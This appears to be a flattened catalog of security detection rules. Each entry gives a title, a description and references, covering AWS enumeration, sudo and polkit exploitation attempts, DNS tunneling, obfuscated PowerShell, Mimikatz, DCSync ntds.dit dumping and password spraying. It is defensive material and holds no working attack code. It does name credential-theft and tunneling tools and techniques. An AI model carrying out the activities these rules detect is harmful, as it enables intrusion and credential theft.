Detects potential enumeration activity targeting an AWS instance backups |
https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/ |
Account Enumeration on AWS |
Detects enumeration of accounts configuration via api call to list different instances and services within a short period of time. |
None |
Potential Network Enumeration on AWS |
Detects network enumeration performed on AWS. |
https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/ |
Potential Storage Enumeration on AWS |
Detects potential enumeration activity targeting AWS storage |
https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/ |
AWS Lambda Function Created or Invoked |
Detects when an user creates or invokes a lambda function. |
https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/ |
AWS Macie Evasion |
Detects evade to Macie detection. |
https://docs.aws.amazon.com/cli/latest/reference/macie/ |
Potential AWS Cloud Email Service Abuse |
Detects when the email sending feature is enabled for an AWS account and the email address verification request is dispatched in quick succession |
https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/ |
Sign-in Failure Bad Password Threshold |
Define a baseline threshold and then monitor and adjust to suit your organizational behaviors and limit false alerts from being generated. |
https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor |
CVE-2021-3156 Exploitation Attempt |
Detects exploitation attempt of vulnerability described in CVE-2021-3156.
Alternative approach might be to look for flooding of auditd logs due to bruteforcing
required to trigger the heap-based buffer overflow.
|
https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit |
CVE-2021-3156 Exploitation Attempt Bruteforcing |
Detects exploitation attempt of vulnerability described in CVE-2021-3156.
Alternative approach might be to look for flooding of auditd logs due to bruteforcing.
required to trigger the heap-based buffer overflow.
|
https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit |
Potential CVE-2021-4034 Exploitation Attempt |
Detects exploitation attempt of the vulnerability described in CVE-2021-4034. |
https://github.com/berdav/CVE-2021-4034, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034, https://access.redhat.com/security/cve/CVE-2021-4034 |
Use of Debugfs to Access a Raw Disk |
Detects access to a raw disk on a host to evade detection by security products. |
https://twitter.com/0xm1rch/status/1600857731073654784?s=20&t=MdrBPqv4hnBEfAJBayMCZA, https://github.com/Neo23x0/auditd/blob/master/audit.rules |
OMIGOD SCX RunAsProvider ExecuteScript |
Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite. |
https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure, https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/, https://github.com/Azure/Azure-Sentinel/pull/3071/files |
Failed Logins with Different Accounts from Single Source - Linux |
Detects suspicious failed logins with different user accounts from a single source system |
None |
Privilege Escalation Preparation |
Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. |
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/, https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/, https://github.com/uber-common/metta/blob/master/MITRE/Privilege_Escalation/privesc_linux_filesystemweakness.yml |
Possible DNS Tunneling |
Normally, DNS logs contain a limited amount of different dns queries for a single domain. This rule detects a high amount of queries for a single domain, which can be an indicator that DNS is used to transfer data. |
https://zeltser.com/c2-dns-tunneling/, https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/ |
High DNS Bytes Out |
High DNS queries bytes amount from host per short period of time |
None |
High NULL Records Requests Rate |
Extremely high rate of NULL record type DNS requests from host per short period of time. Possible result of iodine tool execution |
None |
High DNS Requests Rate |
High DNS requests amount from host per short period of time |
None |
High DNS subdomain requests rate per domain |
High rate of unique Fully Qualified Domain Names (FQDN) requests per root domain (eTLD+1) in short period of time |
None |
High TXT Records Requests Rate |
Extremely high rate of TXT record type DNS requests from host per short period of time. Possible result of Do-exfiltration tool execution |
None |
Large domain name request |
Detects large DNS domain names |
None |
High DNS Bytes Out - Firewall |
High DNS queries bytes amount from host per short period of time |
None |
High DNS Requests Rate - Firewall |
High DNS requests amount from host per short period of time |
None |
Network Scans Count By Destination IP |
Detects many failed connection attempts to different ports or hosts |
None |
Possible DNS Rebinding |
Detects DNS-answer with TTL <10. |
https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325 |
Network Scans Count By Destination Port |
Detects many failed connection attempts to different ports or hosts |
None |
Multiple Modsecurity Blocks |
Detects multiple blocks by the mod_security module (Web Application Firewall) |
None |
Multiple Suspicious Resp Codes Caused by Single Client |
Detects possible exploitation activity or bugs in a web application |
None |
Invoke-Obfuscation CLIP+ Launcher |
Detects Obfuscated use of Clip.exe to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Obfuscated IEX Invocation |
Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework (See reference section for code block) |
https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888 |
Invoke-Obfuscation STDIN+ Launcher |
Detects Obfuscated use of stdin to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Possible DNS Rebinding |
Detects several different DNS-answers by one domain with IPs from internal and external networks. Normally, DNS-answer contain TTL >100. (DNS-record will saved in host cache for a while TTL). |
https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325 |
Invoke-Obfuscation VAR+ Launcher |
Detects Obfuscated use of Environment Variables to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation COMPRESS OBFUSCATION |
Detects Obfuscated Powershell via COMPRESS OBFUSCATION |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation RUNDLL LAUNCHER |
Detects Obfuscated Powershell via RUNDLL LAUNCHER |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Stdin |
Detects Obfuscated Powershell via Stdin in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use Clip |
Detects Obfuscated Powershell via use Clip.exe in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use MSHTA |
Detects Obfuscated Powershell via use MSHTA in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use Rundll32 |
Detects Obfuscated Powershell via use Rundll32 in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION |
Detects Obfuscated Powershell via VAR++ LAUNCHER |
https://github.com/SigmaHQ/sigma/issues/1009 |
Meterpreter or Cobalt Strike Getsystem Service Installation |
Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation |
https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ |
Tap Driver Installation |
Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques |
None |
File Creation by Office Applications |
This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice. |
https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml |
Mimikatz In-Memory |
Detects certain DLL loads when Mimikatz gets executed |
https://securityriskadvisors.com/blog/post/detecting-in-memory-mimikatz/ |
Execution via CL_Invocation.ps1 (2 Lines) |
Detects Execution via SyncInvoke in CL_Invocation.ps1 module |
https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/, https://twitter.com/bohops/status/948061991012327424 |
Execution via CL_Mutexverifiers.ps1 (2 Lines) |
Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module |
https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/, https://twitter.com/pabraeken/status/995111125447577600 |
Silence.Downloader V3 |
Detects Silence downloader. These commands are hardcoded into the binary. |
None |
Automated Turla Group Lateral Movement |
Detects automated lateral movement by Turla group |
https://securelist.com/the-epic-turla-operation/65545/ |
DNSCat2 Powershell Implementation Detection Via Process Creation |
The PowerShell implementation of DNSCat2 calls nslookup to craft queries. Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally. |
https://github.com/lukebaggett/dnscat2-powershell, https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html, https://ragged-lab.blogspot.com/2020/06/it-is-always-dns-powershell-edition.html |
Reconnaissance Activity Using BuiltIn Commands |
Detects execution of a set of builtin commands often used in recon stages by different attack groups |
https://twitter.com/haroonmeer/status/939099379834658817, https://twitter.com/c_APT_ure/status/939475433711722497, https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html |
Quick Execution of a Series of Suspicious Commands |
Detects multiple suspicious process in a limited timeframe |
https://car.mitre.org/wiki/CAR-2013-04-002 |
MSI Spawned Cmd and Powershell Spawned Processes |
This rule looks for Windows Installer service (msiexec.exe) spawning command line and/or powershell that spawns other processes |
https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-50-638.jpg, https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment |
Always Install Elevated Parent Child Correlated |
This rule will looks any process with low privilege launching Windows Installer service (msiexec.exe) that tries to install MSI packages with SYSTEM privilege |
https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg |
Files Dropped to Program Files by Non-Priviledged Process |
Search for dropping of files to Windows/Program Files fodlers by non-priviledged processes |
https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-37-638.jpg |
Stored Credentials in Fake Files |
Search for accessing of fake files with stored credentials |
https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-13-638.jpg |
Dumping ntds.dit remotely via DCSync |
ntds.dit retrieving using synchronisation with legitimate domain controller using Directory Replication Service Remote Protocol |
https://twitter.com/gentilkiwi/status/1003236624925413376, https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2, https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment |
Dumping ntds.dit remotely via NetSync |
ntds.dit retrieving (only computer accounts) using synchronisation with legit domain controller using Netlogon Remote Protocol |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment |
Windows Kernel and 3rd-Party Drivers Exploits Token Stealing |
Detection of child processes spawned with SYSTEM privileges by parents with non-SYSTEM privileges and Medium integrity level |
https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment |
Malicious Service Installations |
Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities. |
https://awakesecurity.com/blog/threat-hunting-for-paexec/, https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html, https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf |
Metasploit Or Impacket Service Installation Via SMB PsExec |
Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation |
https://bczyz1.github.io/2021/01/30/psexec.html |
Detection of Possible Rotten Potato |
Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE privileges |
https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ |
Remote Schtasks Creation |
Detects remote execution via scheduled task creation or update on the destination host |
https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view |
Enumeration via the Global Catalog |
Detects enumeration of the global catalog (that can be performed using BloodHound or others AD reconnaissance tools). Adjust Threshold according to domain width. |
https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5156 |
Rare Schtasks Creations |
Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code |
None |
Password Spraying via Explicit Credentials |
Detects a single user failing to authenticate to multiple users using explicit credentials. |
https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying |
Multiple Users Failing to Authenticate from Single Process |
Detects failed logins with multiple accounts from a single process on the system. |
https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying, https://www.trimarcsecurity.com/single-post/2018/05/06/trimarc-research-detecting-password-spraying-with-security-event-auditing |
Failed Logins with Different Accounts from Single Source System |
Detects suspicious failed logins with different user accounts from a single source system |
None |
Failed NTLM Logins with Different Accounts from Single Source System |
Detects suspicious failed logins with different user accounts from a single source system |
None |
Valid Users Failing to Authenticate From Single Source Using Kerberos |
Detects multiple failed logins with multiple valid domain accounts from a single source system using the Kerberos protocol. |
https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying |
Disabled Users Failing To Authenticate From Source Using Kerberos |
Detects failed logins with multiple disabled domain accounts from a single source system using the Kerberos protocol. |
https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying |
Invalid Users Failing To Authenticate From Source Using Kerberos |
Detects failed logins with multiple invalid domain accounts from a single source system using the Kerberos protocol. |
https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying |
Valid Users Failing to Authenticate from Single Source Using NTLM |
Detects failed logins with multiple valid domain accounts from a single source system using the NTLM protocol. |
https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying |
Invalid Users Failing To Authenticate From Single Source Using NTLM |
Detects failed logins with multiple invalid domain accounts from a single source system using the NTLM protocol. |
https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying |
Multiple Users Remotely Failing To Authenticate From Single Source |
Detects a source system failing to authenticate against a remote host with multiple users. |
https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying |
Suspicious Multiple File Rename Or Delete Occurred |
Detects multiple file rename or delete events occurrence within a specified period of time by a same user (these events may signalize about ransomware activity). |
https://www.manageengine.com/data-security/how-to/how-to-detect-ransomware-attacks.html |
Possible Remote Password Change Through SAMR |
Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser().
"Audit User Account Management" in "Advanced Audit Policy Configuration" has to be enabled in your local security policy / GPO to see this events.
|
None |
Suspicious Werfault.exe Network Connection Outbound |
Adversaries can migrate cobalt strike/metasploit/C2 beacons on compromised systems to legitimate werfault.exe process to avoid detection. |
https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/ |
Failed Mounting of Hidden Share |
Detects repeated failed (outgoing) attempts to mount a hidden share |
https://twitter.com/moti_b/status/1032645458634653697, https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5 |
Rare Service Installations |
Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services |
None |
Rare Scheduled Task Creations |
This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names. |
None |
Domain User Enumeration Network Recon 01 |
Domain user and group enumeration via network reconnaissance.
Seen in APT 29 and other common tactics and actors. Detects a set of RPC (remote procedure calls) used to enumerate a domain controller.
The rule was created based off the datasets and hackathon from https://github.com/OTRF/detection-hackathon-apt29
|
https://github.com/OTRF/detection-hackathon-apt29, https://github.com/OTRF/detection-hackathon-apt29/issues/37 |
Potential Exfiltration of Compressed Files |
This rule detects potential exfiltration by looking for a few compression extensions in the uri and signs of compression in the mime type, file type, and http body
|
https://github.com/OTRF/detection-hackathon-apt29/issues/17 |